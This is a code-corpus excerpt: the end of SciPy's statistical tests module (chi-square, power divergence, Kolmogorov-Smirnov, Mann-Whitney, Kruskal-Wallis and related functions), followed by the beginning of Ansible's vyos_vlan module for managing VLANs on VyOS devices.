distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
lambda_ : float or str, optional
`lambda_` gives the power in the Cressie-Read power divergence
statistic. The default is 1. For convenience, `lambda_` may be
assigned one of the following strings, in which case the
corresponding numerical value is used::
String Value Description
"pearson" 1 Pearson's chi-squared statistic.
In this case, the function is
equivalent to `stats.chisquare`.
"log-likelihood" 0 Log-likelihood ratio. Also known as
the G-test [3]_.
"freeman-tukey" -1/2 Freeman-Tukey statistic.
"mod-log-likelihood" -1 Modified log-likelihood ratio.
"neyman" -2 Neyman's statistic.
"cressie-read" 2/3 The power recommended in [5]_.
Returns
-------
statistic : float or ndarray
The Cressie-Read power divergence test statistic. The value is
a float if `axis` is None or if` `f_obs` and `f_exp` are 1-D.
pvalue : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `stat` are scalars.
See Also
--------
chisquare
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
When `lambda_` is less than zero, the formula for the statistic involves
dividing by `f_obs`, so a warning or error may be generated if any value
in `f_obs` is 0.
Similarly, a warning or error may be generated if any value in `f_exp` is
zero when `lambda_` >= 0.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not a chisquare, in which case this
test is not appropriate.
This function handles masked arrays. If an element of `f_obs` or `f_exp`
is masked, then data at that position is ignored, and does not count
towards the size of the data set.
.. versionadded:: 0.13.0
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8. http://faculty.vassar.edu/lowry/ch8pt1.html
.. [2] "Chi-squared test", http://en.wikipedia.org/wiki/Chi-squared_test
.. [3] "G-test", http://en.wikipedia.org/wiki/G-test
.. [4] Sokal, R. R. and Rohlf, F. J. "Biometry: the principles and
practice of statistics in biological research", New York: Freeman
(1981)
.. [5] Cressie, N. and Read, T. R. C., "Multinomial Goodness-of-Fit
Tests", J. Royal Stat. Soc. Series B, Vol. 46, No. 3 (1984),
pp. 440-464.
Examples
--------
(See `chisquare` for more examples.)
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies. Here we
perform a G-test (i.e. use the log-likelihood ratio statistic):
>>> from scipy.stats import power_divergence
>>> power_divergence([16, 18, 16, 14, 12, 12], lambda_='log-likelihood')
(2.006573162632538, 0.84823476779463769)
The expected frequencies can be given with the `f_exp` argument:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[16, 16, 16, 16, 16, 8],
... lambda_='log-likelihood')
(3.3281031458963746, 0.6495419288047497)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> power_divergence(obs, lambda_="log-likelihood")
(array([ 2.00657316, 6.77634498]), array([ 0.84823477, 0.23781225]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> power_divergence(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> power_divergence(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
test statistic with `ddof`.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we must use ``axis=1``:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8],
... [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
# Convert the input argument `lambda_` to a numerical value.
if isinstance(lambda_, string_types):
if lambda_ not in _power_div_lambda_names:
names = repr(list(_power_div_lambda_names.keys()))[1:-1]
raise ValueError("invalid string for lambda_: {0!r}. Valid strings "
"are {1}".format(lambda_, names))
lambda_ = _power_div_lambda_names[lambda_]
elif lambda_ is None:
lambda_ = 1
f_obs = np.asanyarray(f_obs)
if f_exp is not None:
f_exp = np.atleast_1d(np.asanyarray(f_exp))
else:
# Compute the equivalent of
# f_exp = f_obs.mean(axis=axis, keepdims=True)
# Older versions of numpy do not have the 'keepdims' argument, so
# we have to do a little work to achieve the same result.
# Ignore 'invalid' errors so the edge case of a data set with length 0
# is handled without spurious warnings.
with np.errstate(invalid='ignore'):
f_exp = np.atleast_1d(f_obs.mean(axis=axis))
if axis is not None:
reduced_shape = list(f_obs.shape)
reduced_shape[axis] = 1
f_exp.shape = reduced_shape
# `terms` is the array of terms that are summed along `axis` to create
# the test statistic. We use some specialized code for a few special
# cases of lambda_.
if lambda_ == 1:
# Pearson's chi-squared statistic
terms = (f_obs - f_exp)**2 / f_exp
elif lambda_ == 0:
# Log-likelihood ratio (i.e. G-test)
terms = 2.0 * special.xlogy(f_obs, f_obs / f_exp)
elif lambda_ == -1:
# Modified log-likelihood ratio
terms = 2.0 * special.xlogy(f_exp, f_exp / f_obs)
else:
# General Cressie-Read power divergence.
terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
terms /= 0.5 * lambda_ * (lambda_ + 1)
stat = terms.sum(axis=axis)
num_obs = _count(terms, axis=axis)
ddof = asarray(ddof)
p = distributions.chi2.sf(stat, num_obs - 1 - ddof)
Power_divergenceResult = namedtuple('Power_divergenceResult', ('statistic',
'pvalue'))
return Power_divergenceResult(stat, p)
def chisquare(f_obs, f_exp=None, ddof=0, axis=0):
"""
Calculates a one-way chi square test.
The chi square test tests the null hypothesis that the categorical data
has the given frequencies.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
Returns
-------
chisq : float or ndarray
The chi-squared test statistic. The value is a float if `axis` is
None or `f_obs` and `f_exp` are 1-D.
p : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `chisq` are scalars.
See Also
--------
power_divergence
mstats.chisquare
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not a chisquare, in which case this
test is not appropriate.
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8. http://faculty.vassar.edu/lowry/ch8pt1.html
.. [2] "Chi-squared test", http://en.wikipedia.org/wiki/Chi-squared_test
Examples
--------
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies.
>>> from scipy.stats import chisquare
>>> chisquare([16, 18, 16, 14, 12, 12])
(2.0, 0.84914503608460956)
With `f_exp` the expected frequencies can be given.
>>> chisquare([16, 18, 16, 14, 12, 12], f_exp=[16, 16, 16, 16, 16, 8])
(3.5, 0.62338762774958223)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> chisquare(obs)
(array([ 2. , 6.66666667]), array([ 0.84914504, 0.24663415]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> chisquare(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> chisquare(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
chi-squared statistic with `ddof`.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we use ``axis=1``:
>>> chisquare([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8], [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
return power_divergence(f_obs, f_exp=f_exp, ddof=ddof, axis=axis,
lambda_="pearson")
def ks_2samp(data1, data2):
"""
Computes the Kolmogorov-Smirnov statistic on 2 samples.
This is a two-sided test for the null hypothesis that 2 independent samples
are drawn from the same continuous distribution.
Parameters
----------
data1, data2 : sequence of 1-D ndarrays
two arrays of sample observations assumed to be drawn from a continuous
distribution, sample sizes can be different
Returns
-------
statistic : float
KS statistic
pvalue : float
two-tailed p-value
Notes
-----
This tests whether 2 samples are drawn from the same distribution. Note
that, like in the case of the one-sample K-S test, the distribution is
assumed to be continuous.
This is the two-sided test, one-sided tests are not implemented.
The test uses the two-sided asymptotic Kolmogorov-Smirnov distribution.
If the K-S statistic is small or the p-value is high, then we cannot
reject the hypothesis that the distributions of the two samples
are the same.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678) #fix random seed to get the same result
>>> n1 = 200 # size of first sample
>>> n2 = 300 # size of second sample
For a different distribution, we can reject the null hypothesis since the
pvalue is below 1%:
>>> rvs1 = stats.norm.rvs(size=n1, loc=0., scale=1)
>>> rvs2 = stats.norm.rvs(size=n2, loc=0.5, scale=1.5)
>>> stats.ks_2samp(rvs1, rvs2)
(0.20833333333333337, 4.6674975515806989e-005)
For a slightly different distribution, we cannot reject the null hypothesis
at a 10% or lower alpha since the p-value at 0.144 is higher than 10%
>>> rvs3 = stats.norm.rvs(size=n2, loc=0.01, scale=1.0)
>>> stats.ks_2samp(rvs1, rvs3)
(0.10333333333333333, 0.14498781825751686)
For an identical distribution, we cannot reject the null hypothesis since
the p-value is high, 41%:
>>> rvs4 = stats.norm.rvs(size=n2, loc=0.0, scale=1.0)
>>> stats.ks_2samp(rvs1, rvs4)
(0.07999999999999996, 0.41126949729859719)
"""
data1 = np.sort(data1)
data2 = np.sort(data2)
n1 = data1.shape[0]
n2 = data2.shape[0]
data_all = np.concatenate([data1, data2])
cdf1 = np.searchsorted(data1, data_all, side='right') / (1.0*n1)
cdf2 = np.searchsorted(data2, data_all, side='right') / (1.0*n2)
d = np.max(np.absolute(cdf1 - cdf2))
# Note: d absolute not signed distance
en = np.sqrt(n1 * n2 / float(n1 + n2))
try:
prob = distributions.kstwobign.sf((en + 0.12 + 0.11 / en) * d)
except:
prob = 1.0
Ks_2sampResult = namedtuple('Ks_2sampResult', ('statistic', 'pvalue'))
return Ks_2sampResult(d, prob)
def mannwhitneyu(x, y, use_continuity=True, alternative='two-sided'):
"""
Computes the Mann-Whitney rank test on samples x and y.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
use_continuity : bool, optional
Whether a continuity correction (1/2.) should be taken into
account. Default is True.
Returns
-------
statistic : float
The Mann-Whitney statistics.
pvalue : float
One-sided p-value assuming a asymptotic normal distribution.
Notes
-----
Use only when the number of observation in each sample is > 20 and
you have 2 independent samples of ranks. Mann-Whitney U is
significant if the u-obtained is LESS THAN or equal to the critical
value of U.
This test corrects for ties and by default uses a continuity correction.
The reported p-value is for a one-sided hypothesis, to get the two-sided
p-value multiply the returned p-value by 2.
"""
x = np.asarray(x)
y = np.asarray(y)
n1 = len(x)
n2 = len(y)
ranked = rankdata(np.concatenate((x, y)))
rankx = ranked[0:n1] # get the x-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - np.sum(rankx, axis=0) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
T = tiecorrect(ranked)
if T == 0:
raise ValueError('All numbers are identical in amannwhitneyu')
sd = np.sqrt(T * n1 * n2 * (n1+n2+1) / 12.0)
fact2 = 1
meanrank = n1*n2/2.0 + 0.5 * use_continuity
if alternative == 'less':
z = u1 - meanrank
elif alternative == 'greater':
z = u2 - meanrank
elif alternative == 'two-sided':
bigu = max(u1, u2)
z = np.abs(bigu - meanrank)
fact2 = 2.
else:
raise ValueError("alternative should be 'less', 'greater'"
"or 'two-sided'")
z = z / sd
MannwhitneyuResult = namedtuple('MannwhitneyuResult', ('statistic',
'pvalue'))
return MannwhitneyuResult(u2, distributions.norm.sf(z) * fact2)
def ranksums(x, y):
"""
Compute the Wilcoxon rank-sum statistic for two samples.
The Wilcoxon rank-sum test tests the null hypothesis that two sets
of measurements are drawn from the same distribution. The alternative
hypothesis is that values in one sample are more likely to be
larger than the values in the other sample.
This test should be used to compare two samples from continuous
distributions. It does not handle ties between measurements
in x and y. For tie-handling and an optional continuity correction
see `scipy.stats.mannwhitneyu`.
Parameters
----------
x,y : array_like
The data from the two samples
Returns
-------
statistic : float
The test statistic under the large-sample approximation that the
rank sum statistic is normally distributed
pvalue : float
The two-sided p-value of the test
References
----------
.. [1] http://en.wikipedia.org/wiki/Wilcoxon_rank-sum_test
"""
x, y = map(np.asarray, (x, y))
n1 = len(x)
n2 = len(y)
alldata = np.concatenate((x, y))
ranked = rankdata(alldata)
x = ranked[:n1]
s = np.sum(x, axis=0)
expected = n1 * (n1+n2+1) / 2.0
z = (s - expected) / np.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2 * distributions.norm.sf(abs(z))
RanksumsResult = namedtuple('RanksumsResult', ('statistic', 'pvalue'))
return RanksumsResult(z, prob)
def kruskal(*args, **kwargs):
"""
Compute the Kruskal-Wallis H-test for independent samples
The Kruskal-Wallis H-test tests the null hypothesis that the population
median of all of the groups are equal. It is a non-parametric version of
ANOVA. The test works on 2 or more independent samples, which may have
different sizes. Note that rejecting the null hypothesis does not
indicate which of the groups differs. Post-hoc comparisons between
groups are required to determine which groups are different.
Parameters
----------
sample1, sample2, ... : array_like
Two or more arrays with the sample measurements can be given as
arguments.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float
The Kruskal-Wallis H statistic, corrected for ties
pvalue : float
The p-value for the test using the assumption that H has a chi
square distribution
See Also
--------
f_oneway : 1-way ANOVA
mannwhitneyu : Mann-Whitney rank test on two samples.
friedmanchisquare : Friedman test for repeated measurements
Notes
-----
Due to the assumption that H has a chi square distribution, the number
of samples in each group must not be too small. A typical rule is
that each sample must have at least 5 measurements.
References
----------
.. [1] W. H. Kruskal & W. W. Wallis, "Use of Ranks in
One-Criterion Variance Analysis", Journal of the American Statistical
Association, Vol. 47, Issue 260, pp. 583-621, 1952.
.. [2] http://en.wikipedia.org/wiki/Kruskal-Wallis_one-way_analysis_of_variance
Examples
--------
>>> from scipy import stats
>>> x = [1, 3, 5, 7, 9]
>>> y = [2, 4, 6, 8, 10]
>>> stats.kruskal(x, y)
KruskalResult(statistic=0.27272727272727337, pvalue=0.60150813444058948)
>>> x = [1, 1, 1]
>>> y = [2, 2, 2]
>>> z = [2, 2]
>>> stats.kruskal(x, y, z)
KruskalResult(statistic=7.0, pvalue=0.030197383422318501)
"""
args = list(map(np.asarray, args))
num_groups = len(args)
if num_groups < 2:
raise ValueError("Need at least two groups in stats.kruskal()")
KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))
for arg in args:
if arg.size == 0:
return KruskalResult(np.nan, np.nan)
n = np.asarray(list(map(len, args)))
if 'nan_policy' in kwargs.keys():
if kwargs['nan_policy'] not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be 'propagate', "
"'raise' or'omit'")
else:
nan_policy = kwargs['nan_policy']
else:
nan_policy = 'propagate'
KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))
contains_nan = False
for arg in args:
cn = _contains_nan(arg, nan_policy)
if cn[0]:
contains_nan = True
break
if contains_nan and nan_policy == 'omit':
for a in args:
a = ma.masked_invalid(a)
return mstats_basic.kruskal(*args)
if contains_nan and nan_policy == 'propagate':
return KruskalResult(np.nan, np.nan)
alldata = np.concatenate(args)
ranked = rankdata(alldata)
ties = tiecorrect(ranked)
if ties == 0:
raise ValueError('All numbers are identical in kruskal')
# Compute sum^2/n for each group and sum
j = np.insert(np.cumsum(n), 0, 0)
ssbn = 0
for i in range(num_groups):
ssbn += _square_of_sums(ranked[j[i]:j[i+1]]) / float(n[i])
totaln = np.sum(n)
h = 12.0 / (totaln * (totaln + 1)) * ssbn - 3 * (totaln + 1)
df = num_groups - 1
h /= ties
return KruskalResult(h, distributions.chi2.sf(h, df))
def friedmanchisquare(*args):
"""
Computes the Friedman test for repeated measurements
The Friedman test tests the null hypothesis that repeated measurements of
the same individuals have the same distribution. It is often used
to test for consistency among measurements obtained in different ways.
For example, if two measurement techniques are used on the same set of
individuals, the Friedman test can be used to determine if the two
measurement techniques are consistent.
Parameters
----------
measurements1, measurements2, measurements3... : array_like
Arrays of measurements. All of the arrays must have the same number
of elements. At least 3 sets of measurements must be given.
Returns
-------
statistic : float
the test statistic, correcting for ties
pvalue : float
the associated p-value assuming that the test statistic has a chi
squared distribution
Notes
-----
Due to the assumption that the test statistic has a chi squared
distribution, the p-value is only reliable for n > 10 and more than
6 repeated measurements.
References
----------
.. [1] http://en.wikipedia.org/wiki/Friedman_test
"""
k = len(args)
if k < 3:
raise ValueError('\nLess than 3 levels. Friedman test not appropriate.\n')
n = len(args[0])
for i in range(1, k):
if len(args[i]) != n:
raise ValueError('Unequal N in friedmanchisquare. Aborting.')
# Rank data
data = np.vstack(args).T
data = data.astype(float)
for i in range(len(data)):
data[i] = rankdata(data[i])
# Handle ties
ties = 0
for i in range(len(data)):
replist, repnum = find_repeats(array(data[i]))
for t in repnum:
ties += t * (t*t - 1)
c = 1 - ties / float(k*(k*k - 1)*n)
ssbn = np.sum(data.sum(axis=0)**2)
chisq = (12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)) / c
FriedmanchisquareResult = namedtuple('FriedmanchisquareResult',
('statistic', 'pvalue'))
return FriedmanchisquareResult(chisq, distributions.chi2.sf(chisq, k - 1))
def combine_pvalues(pvalues, method='fisher', weights=None):
"""
Methods for combining the p-values of independent tests bearing upon the
same hypothesis.
Parameters
----------
pvalues : array_like, 1-D
Array of p-values assumed to come from independent tests.
method : {'fisher', 'stouffer'}, optional
Name of method to use to combine p-values. The following methods are
available:
- "fisher": Fisher's method (Fisher's combined probability test),
the default.
- "stouffer": Stouffer's Z-score method.
weights : array_like, 1-D, optional
Optional array of weights used only for Stouffer's Z-score method.
Returns
-------
statistic: float
The statistic calculated by the specified method:
- "fisher": The chi-squared statistic
- "stouffer": The Z-score
pval: float
The combined p-value.
Notes
-----
Fisher's method (also known as Fisher's combined probability test) [1]_ uses
a chi-squared statistic to compute a combined p-value. The closely related
Stouffer's Z-score method [2]_ uses Z-scores rather than p-values. The
advantage of Stouffer's method is that it is straightforward to introduce
weights, which can make Stouffer's method more powerful than Fisher's
method when the p-values are from studies of different size [3]_ [4]_.
Fisher's method may be extended to combine p-values from dependent tests
[5]_. Extensions such as Brown's method and Kost's method are not currently
implemented.
.. versionadded:: 0.15.0
References
----------
.. [1] https://en.wikipedia.org/wiki/Fisher%27s_method
.. [2] http://en.wikipedia.org/wiki/Fisher's_method#Relation_to_Stouffer.27s_Z-score_method
.. [3] Whitlock, M. C. "Combining probability from independent tests: the
weighted Z-method is superior to Fisher's approach." Journal of
Evolutionary Biology 18, no. 5 (2005): 1368-1373.
.. [4] Zaykin, Dmitri V. "Optimally weighted Z-test is a powerful method
for combining probabilities in meta-analysis." Journal of
Evolutionary Biology 24, no. 8 (2011): 1836-1841.
.. [5] https://en.wikipedia.org/wiki/Extensions_of_Fisher%27s_method
"""
pvalues = np.asarray(pvalues)
if pvalues.ndim != 1:
raise ValueError("pvalues is not 1-D")
if method == 'fisher':
Xsq = -2 * np.sum(np.log(pvalues))
pval = distributions.chi2.sf(Xsq, 2 * len(pvalues))
return (Xsq, pval)
elif method == 'stouffer':
if weights is None:
weights = np.ones_like(pvalues)
elif len(weights) != len(pvalues):
raise ValueError("pvalues and weights must be of the same size.")
weights = np.asarray(weights)
if weights.ndim != 1:
raise ValueError("weights is not 1-D")
Zi = distributions.norm.isf(pvalues)
Z = np.dot(weights, Zi) / np.linalg.norm(weights)
pval = distributions.norm.sf(Z)
return (Z, pval)
else:
raise ValueError(
"Invalid method '%s'. Options are 'fisher' or 'stouffer'", method)
#####################################
# PROBABILITY CALCULATIONS #
#####################################
@np.deprecate(message="stats.chisqprob is deprecated in scipy 0.17.0; "
"use stats.distributions.chi2.sf instead.")
def chisqprob(chisq, df):
"""
Probability value (1-tail) for the Chi^2 probability distribution.
Broadcasting rules apply.
Parameters
----------
chisq : array_like or float > 0
df : array_like or float, probably int >= 1
Returns
-------
chisqprob : ndarray
The area from `chisq` to infinity under the Chi^2 probability
distribution with degrees of freedom `df`.
"""
return distributions.chi2.sf(chisq, df)
@np.deprecate(message="stats.betai is deprecated in scipy 0.17.0; "
"use special.betainc instead")
def betai(a, b, x):
"""
Returns the incomplete beta function.
I_x(a,b) = 1/B(a,b)*(Integral(0,x) of t^(a-1)(1-t)^(b-1) dt)
where a,b>0 and B(a,b) = G(a)*G(b)/(G(a+b)) where G(a) is the gamma
function of a.
The standard broadcasting rules apply to a, b, and x.
Parameters
----------
a : array_like or float > 0
b : array_like or float > 0
x : array_like or float
x will be clipped to be no greater than 1.0 .
Returns
-------
betai : ndarray
Incomplete beta function.
"""
return _betai(a, b, x)
def _betai(a, b, x):
x = np.asarray(x)
x = np.where(x < 1.0, x, 1.0) # if x > 1 then return 1.0
return special.betainc(a, b, x)
#####################################
# ANOVA CALCULATIONS #
#####################################
@np.deprecate(message="stats.f_value_wilks_lambda deprecated in scipy 0.17.0")
def f_value_wilks_lambda(ER, EF, dfnum, dfden, a, b):
"""Calculation of Wilks lambda F-statistic for multivarite data, per
Maxwell & Delaney p.657.
"""
if isinstance(ER, (int, float)):
ER = array([[ER]])
if isinstance(EF, (int, float)):
EF = array([[EF]])
lmbda = linalg.det(EF) / linalg.det(ER)
if (a-1)**2 + (b-1)**2 == 5:
q = 1
else:
q = np.sqrt(((a-1)**2*(b-1)**2 - 2) / ((a-1)**2 + (b-1)**2 - 5))
n_um = (1 - lmbda**(1.0/q))*(a-1)*(b-1)
d_en = lmbda**(1.0/q) / (n_um*q - 0.5*(a-1)*(b-1) + 1)
return n_um / d_en
@np.deprecate(message="stats.f_value deprecated in scipy 0.17.0")
def f_value(ER, EF, dfR, dfF):
"""
Returns an F-statistic for a restricted vs. unrestricted model.
Parameters
----------
ER : float
`ER` is the sum of squared residuals for the restricted model
or null hypothesis
EF : float
`EF` is the sum of squared residuals for the unrestricted model
or alternate hypothesis
dfR : int
`dfR` is the degrees of freedom in the restricted model
dfF : int
`dfF` is the degrees of freedom in the unrestricted model
Returns
-------
F-statistic : float
"""
return (ER - EF) / float(dfR - dfF) / (EF / float(dfF))
@np.deprecate(message="stats.f_value_multivariate deprecated in scipy 0.17.0")
def f_value_multivariate(ER, EF, dfnum, dfden):
"""
Returns a multivariate F-statistic.
Parameters
----------
ER : ndarray
Error associated with the null hypothesis (the Restricted model).
From a multivariate F calculation.
EF : ndarray
Error associated with the alternate hypothesis (the Full model)
From a multivariate F calculation.
dfnum : int
Degrees of freedom the Restricted model.
dfden : int
Degrees of freedom associated with the Restricted model.
Returns
-------
fstat : float
The computed F-statistic.
"""
if isinstance(ER, (int, float)):
ER = array([[ER]])
if isinstance(EF, (int, float)):
EF = array([[EF]])
n_um = (linalg.det(ER) - linalg.det(EF)) / float(dfnum)
d_en = linalg.det(EF) / float(dfden)
return n_um / d_en
#####################################
# SUPPORT FUNCTIONS #
#####################################
@np.deprecate(message="scipy.stats.ss is deprecated in scipy 0.17.0")
def ss(a, axis=0):
return _sum_of_squares(a, axis)
def _sum_of_squares(a, axis=0):
"""
Squares each element of the input array, and returns the sum(s) of that.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
sum_of_squares : ndarray
The sum along the given axis for (a**2).
See also
--------
_square_of_sums : The square(s) of the sum(s) (the opposite of
`_sum_of_squares`).
"""
a, axis = _chk_asarray(a, axis)
return np.sum(a*a, axis)
@np.deprecate(message="scipy.stats.square_of_sums is deprecated "
"in scipy 0.17.0")
def square_of_sums(a, axis=0):
return _square_of_sums(a, axis)
def _square_of_sums(a, axis=0):
"""
Sums elements of the input array, and returns the square(s) of that sum.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
square_of_sums : float or ndarray
The square of the sum over `axis`.
See also
--------
_sum_of_squares : The sum of squares (the opposite of `square_of_sums`).
"""
a, axis = _chk_asarray(a, axis)
s = np.sum(a, axis)
if not np.isscalar(s):
return s.astype(float) * s
else:
return float(s) * s
@np.deprecate(message="scipy.stats.fastsort is deprecated in scipy 0.16.0")
def fastsort(a):
"""
Sort an array and provide the argsort.
Parameters
----------
a : array_like
Input array.
Returns
-------
fastsort : ndarray of type int
sorted indices into the original array
"""
# TODO: the wording in the docstring is nonsense.
it = np.argsort(a)
as_ = a[it]
return as_, it
| bsd-3-clause |
orgito/ansible | lib/ansible/modules/network/vyos/vyos_vlan.py | 13 | 9326 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: vyos_vlan
version_added: "2.5"
author: "Trishna Guha (@trishnaguha)"
short_description: Manage VLANs on VyOS network devices
description:
- This module provides declarative management of VLANs
on VyOS network devices.
notes:
- Tested against VYOS 1.1.7
options:
name:
description:
- Name of the VLAN.
address:
description:
- Configure Virtual interface address.
vlan_id:
description:
- ID of the VLAN. Range 0-4094.
required: true
interfaces:
description:
- List of interfaces that should be associated to the VLAN.
required: true
associated_interfaces:
description:
- This is a intent option and checks the operational state of the for given vlan C(name)
for associated interfaces. If the value in the C(associated_interfaces) does not match with
the operational state of vlan on device it will result in failure.
version_added: "2.5"
delay:
description:
- Delay the play should wait to check for declarative intent params values.
default: 10
aggregate:
description: List of VLANs definitions.
purge:
description:
- Purge VLANs not defined in the I(aggregate) parameter.
default: no
type: bool
state:
description:
- State of the VLAN configuration.
default: present
choices: ['present', 'absent']
extends_documentation_fragment: vyos
"""
EXAMPLES = """
- name: Create vlan
vyos_vlan:
vlan_id: 100
name: vlan-100
interfaces: eth1
state: present
- name: Add interfaces to VLAN
vyos_vlan:
vlan_id: 100
interfaces:
- eth1
- eth2
- name: Configure virtual interface address
vyos_vlan:
vlan_id: 100
interfaces: eth1
address: 172.26.100.37/24
- name: vlan interface config + intent
vyos_vlan:
vlan_id: 100
interfaces: eth0
associated_interfaces:
- eth0
- name: vlan intent check
vyos_vlan:
vlan_id: 100
associated_interfaces:
- eth3
- eth4
- name: Delete vlan
vyos_vlan:
vlan_id: 100
interfaces: eth1
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set interfaces ethernet eth1 vif 100 description VLAN 100
- set interfaces ethernet eth1 vif 100 address 172.26.100.37/24
- delete interfaces ethernet eth1 vif 100
"""
import re
import time
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
from ansible.module_utils.network.vyos.vyos import load_config, run_commands
from ansible.module_utils.network.vyos.vyos import vyos_argument_spec
def search_obj_in_list(vlan_id, lst):
obj = list()
for o in lst:
if o['vlan_id'] == vlan_id:
obj.append(o)
return obj
def map_obj_to_commands(updates, module):
commands = list()
want, have = updates
purge = module.params['purge']
for w in want:
vlan_id = w['vlan_id']
name = w['name']
address = w['address']
state = w['state']
interfaces = w['interfaces']
obj_in_have = search_obj_in_list(vlan_id, have)
if state == 'absent':
if obj_in_have:
for obj in obj_in_have:
for i in obj['interfaces']:
commands.append('delete interfaces ethernet {0} vif {1}'.format(i, vlan_id))
elif state == 'present':
if not obj_in_have:
if w['interfaces'] and w['vlan_id']:
for i in w['interfaces']:
cmd = 'set interfaces ethernet {0} vif {1}'.format(i, vlan_id)
if w['name']:
commands.append(cmd + ' description {}'.format(name))
elif w['address']:
commands.append(cmd + ' address {}'.format(address))
else:
commands.append(cmd)
if purge:
for h in have:
obj_in_want = search_obj_in_list(h['vlan_id'], want)
if not obj_in_want:
for i in h['interfaces']:
commands.append('delete interfaces ethernet {0} vif {1}'.format(i, h['vlan_id']))
